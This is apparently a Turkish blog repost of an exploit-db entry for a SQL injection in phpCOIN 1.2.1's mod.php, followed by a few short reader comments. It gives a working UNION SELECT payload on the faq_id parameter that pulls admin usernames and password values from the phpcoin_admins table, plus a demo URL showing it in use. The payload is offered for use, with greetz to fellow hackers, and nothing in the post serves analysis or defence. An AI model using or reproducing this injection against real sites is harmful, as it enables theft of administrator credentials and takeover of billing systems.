phpCOIN 1.2.1 (mod.php) SQL Injection Vulnerability

24 Şub

phpCOIN 1.2.1 (mod.php) SQL Injection Vulnerability

Posted 24 Şubat 2010 by Admin in 1. Tagged: (mod.php), phpCOIN 1.2.1, SQL Injection, Vulnerability. 3 Yorum

###########################

Author : Baybora

Homepage : http://www.1923turk.com

Blog : https://baybora.wordpress.com/

Script : phpCOIN 1.2.1

Download : http://www.phpcoin.com/

###########################

[ Vulnerable File ]

mod.php?mod=faq&mode=show&faq_id= [ SQL ]

[ XpL ]

-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins–

[ Demo]

http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins–

##############################################################
# Greetz: Manas58 – Gamoscu – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
##############################################################

http://www.exploit-db.com/exploits/11565

Reklamlar

3 responses to this post.

Posted by POmAK on 27 Ağustos 2010 at 15:35

Süper!!

Cevapla
Posted by wolf-system on 23 Eylül 2010 at 15:35

thanks. thanks…………….. thanks : )

Cevapla
Posted by Learn To Bartend on 20 Ocak 2012 at 15:35

I like this one terribly a lot of for a few reason

Cevapla

Bir Cevap Yazın Cevabı iptal et

Yorumunuzu buraya yazın...

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

E-posta (gerekli) (Adres hiçbir zaman paylaşılmayacaktır)

İsim (gerekli)

İnternet sitesi

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. ( Çıkış Yap / Değiştir )

Twitter hesabınızı kullanarak yorum yapıyorsunuz. ( Çıkış Yap / Değiştir )

Facebook hesabınızı kullanarak yorum yapıyorsunuz. ( Çıkış Yap / Değiştir )

Google+ hesabınızı kullanarak yorum yapıyorsunuz. ( Çıkış Yap / Değiştir )

Vazgeç

Connecting to %s

Baybora BURADA!! İnsanları Tanımak,İnsanları Anlamak Zor Değil ki…